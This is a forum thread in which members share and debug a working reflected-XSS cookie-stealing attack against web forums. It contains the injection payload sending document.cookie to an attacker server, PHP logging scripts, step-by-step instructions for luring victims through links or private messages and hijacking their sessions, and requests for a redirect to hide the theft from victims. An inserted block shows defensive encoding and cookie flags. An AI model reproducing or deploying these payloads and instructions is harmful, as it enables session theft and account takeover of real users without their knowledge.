0
m93's Avatar, Join Date: Nov 2009
m93
Go4Expert Member
Thanks, it was very useful.

I have some questions.
If I give the users cookies, can I manage that cookie (for refresh) except in Firefox (for example Opera; managing cookies in Opera is easy)? And I must edit the sid, yes? Thanks.
(I inserted the link in a phpBB forum. When the users click on it, is their cookie saved in log.txt? And to refresh their cookies, I don't need the usernames?)

Thanks
0
Toddie's Avatar, Join Date: Jan 2010
Contributor
I am testing a xss vulnerability but your script does not work.
your script redirects but does not log cookies.

I am using this script right now and it works fine.

xss injection<script>document.location='url/cookiestealer.php?cookie='+escape(document.cookie) </script>

when i use this injection code cookies are logged into cookies.txt via this script

cookiestealer.php
Quote:
<?php
$cookie = $_GET['cookie'];
$log = fopen("cookies.txt", "a");
fwrite($log, $cookie ."\n");
fclose($log);
?>
This works fine but it does not redirect to a new page. I tried adding redirect code to the injected code and also to the .php file itself and there has been no success. Tampering with the code tends to redirect the page before the logging function executes, or does not redirect the page at all, or both.


I tried your script and it does not work.
why does your script not log cookies? where is the error? If you can't answer that question then here is another question.

what do I need to do to get my script able to redirect to another page after it executes?
0
m93's Avatar, Join Date: Nov 2009
m93
Go4Expert Member
Quote:
Originally Posted by Toddie
I am testing a xss vulnerability but your script does not work.
your script redirects but does not log cookies.

I am using this script right now and it works fine.

xss injection<script>document.location='url/cookiestealer.php?cookie='+escape(document.cookie) </script>

when i use this injection code cookies are logged into cookies.txt via this script

cookiestealer.php


This works fine but it does not redirect to a new page. I tried adding redirect code to the injected code and also to the .php file itself and there has been no success. Tampering with the code tends to redirect the page before the logging function executes, or does not redirect the page at all, or both.


I tried your script and it does not work.
why does your script not log cookies? where is the error? If you can't answer that question then here is another question.

what do I need to do to get my script able to redirect to another page after it executes?
I downloaded the scripts of this topic. The script doesn't have a problem? Please explain: if I want to steal users' cookies (in forums), what should I do (step by step)? Thanks a lot.
0
Toddie's Avatar, Join Date: Jan 2010
Contributor
now this is instructions for my script.
you need to use cookiestealer.php from my post.
you can add h t t p : / / w w w . before the sites name yourself because it will not allow me to post them with this because it gives me an error saying I have too many live links in my post. (take out the spaces)

step 1: find an injection point. i assume you have already done all of this.
for me i found this url because i could not find a place to inject it into a page.
site.com/forums/search.php?query=123456

step 2:
i then erase 123456 and add "> for my injection.

then I add the code I want it to do.

<script>alert(document.cookie);</script>

here is the finished url. if it works, then you will get a popup box that gives you your cookie.

site.com/forums/search.php?query="><script>alert(document.cookie); </script>

step 3: you need to add files to your own server.
for me the files were cookiestealer.php and cookie.txt.
you can find cookiestealer.php in my post and you can create cookie.txt
cookie.txt is an empty .txt file.

step 4:
then you post this link or send it in pm and get people to click it
site.com/forums/search.php?query="><script>document.location='MYsite.com/cookiestealer.php?cookie='+escape(document.cookie) </script>

now when someone clicks that link their cookie will be saved in cookie.txt on your server.
you just edit the cookie with firebug or whatever you use so that the info in the cookie is replaced with the victims cookie.

step 5:
refresh the page you are on at the site and you should be logged in as that user without needing to enter user name or password or anything.

*if you are trying to steal the cookies of an admin you should know that most administrator control panels force you to re-enter your password to access the administrator control panel so cookies will not allow you to access this. you can usually moderate the forums without any password prompt though. but of course as soon as they see this they will fix whatever you did.

___________________________________________________________________________________

now if someone could kindly tell me how to redirect this cookiestealer.php page to another webpage?
otherwise its obvious to the victim that they just got their cookie stolen!

anyone?

this should be simple code but I guess I just don't understand the ins and outs of the code.
I tried a few different ways to redirect the page but none are working. I understand what I need to add for code and I am able to make the page redirect under normal circumstances, but the problem is that the code conflicts with the other code I have and either renders it unworkable or simply redirects the page without allowing the code to execute. I am sure its a simple syntax error or placement of the code for an experienced user it would be easy to find. like I said i tried to redirect in the url itself and in the cookiestealer.php file but I cannot get it to function correctly.

here is one example I tried to add to the file but it does not work.
echo '<script type="text/javascript">setTimeout("location.href=\'newsite.com\'",1*1000)</script>';

please help with this.
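
For the site owner's side of the steps above, an added example (not part of the thread and not the forum's own code): the unescaped reflection that lets a leading `">` break out of the search box, next to the encoded form, plus session cookie flags that keep the session id out of `document.cookie`. The markup and the function names `render_search_box_vulnerable`, `render_search_box` and `harden_session_cookie` are assumptions; the thread never shows the code behind search.php.

```php
<?php
// Added example. The search.php markup is assumed; all names here are hypothetical.

// Vulnerable form: the raw parameter lands inside value="...", so a leading ">
// closes the attribute and the tag, and the rest is parsed as markup.
function render_search_box_vulnerable(string $query): string
{
    return '<input type="text" name="query" value="' . $query . '">';
}

// Hardened form: encode for the HTML attribute context. ENT_QUOTES covers both
// quote characters; ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning ''.
function render_search_box(string $query): string
{
    $safe = htmlspecialchars($query, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="query" value="' . $safe . '">';
}

// Session cookie flags; must run before session_start() and before any output.
// The array form of session_set_cookie_params() needs PHP 7.3 or later.
function harden_session_cookie(): void
{
    session_set_cookie_params([
        'httponly' => true,   // cookie is not exposed to document.cookie
        'secure'   => true,   // cookie is sent over HTTPS only
        'samesite' => 'Lax',  // not sent on cross-site subrequests
    ]);
}

if (PHP_SAPI !== 'cli') {
    harden_session_cookie();
    session_start();
}

// Constructed sample in the shape the thread uses: "> followed by a script element.
$sample = '"><script>alert(document.cookie);</script>';

// A parameter sent as query[]=... arrives as an array; treat it as empty.
$raw   = $_GET['query'] ?? $sample;
$query = is_string($raw) ? $raw : '';

echo render_search_box_vulnerable($query), PHP_EOL; // attribute closed early, script element follows
echo render_search_box($query), PHP_EOL;            // payload stays inside value="..." as text
```

Run from the command line, it prints both renderings of the constructed sample so the difference in the generated markup is visible.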
0
farnoise's Avatar, Join Date: Jan 2010
Newbie Member
Just great, really straightforward. The only problem I'm having is that it's not sending me the cookie; I have everything else but not the cookie.
Here is a sample line of my log file


IP: 24.132.23.14 | PORT: 52020 | HOST: | Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.31318; .NET CLR 3.5.30729) | METHOD: | REF: facebook.com | DATE: Wednesday 13th 2010f January 2010 06:48:06 PM | COOKIE:



I'd appreciate any help and thanks again
0
Toddie's Avatar, Join Date: Jan 2010
Contributor
yeah i already made a comment that the script does not work. I do not know why perhaps it is outdated and only used for older browsers.

at least it prints information for you. for me the file remained blank and nothing was printed.

the script I provided is very simple and works. it gives you the cookie and nothing else... which is all you really need anyways.

I am still waiting for someone to take a look at my script and figure out how to make it redirect to a new page while retaining the functionality of the script itself.

I have a feeling I should not hold my breath.
0
indiansword's Avatar, Join Date: Oct 2008
Security Expert
This should help

PHP Code:
<?php
$cookie = $_GET['c'];
$ip = getenv('REMOTE_ADDR');
$date = date("j F, Y, g:i a");
$referer = getenv('HTTP_REFERER');
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
header("Location: http://www.yourhost.com");
?>
0
Toddie's Avatar, Join Date: Jan 2010
Contributor
That did not work.

What that did is write all information EXCEPT the cookie. and also it did not redirect the page.
0
indiansword's Avatar, Join Date: Oct 2008
Security Expert
It works fine. There should be something tricky on the site that you're trying it on. What's the scripting you're using to steal the cookies?
0
Toddie's Avatar, Join Date: Jan 2010
Contributor
I am not able to inject the code into the site. I am Injecting it into a search query.
The "victim" must click on the link either in a post or a pm that I send them.

Here is an example of the link.
I changed the site name for confidentiality purposes of course.

h t t p : / / w w w .victimsite.com/forums/search.php?query="><script>document.location='h t t p : / / w w w.mysite.com/cookiestealer.php?cookie='+escape(document.cookie) </script>

when I use your script with that link, it displays the info except for the cookie and also it does not redirect.

the script I mention in my first post does work, and i really only need the cookie not all the other info but I would like to get it to redirect which it currently does not.

Also i might note that I tried putting a redirect in the url itself but then the cookiestealer.php does not do anything at all and it simply redirects without logging anything.

if you would like to test it out on your own test server or some free site then I can pm you more details about what the site is that I am doing this on.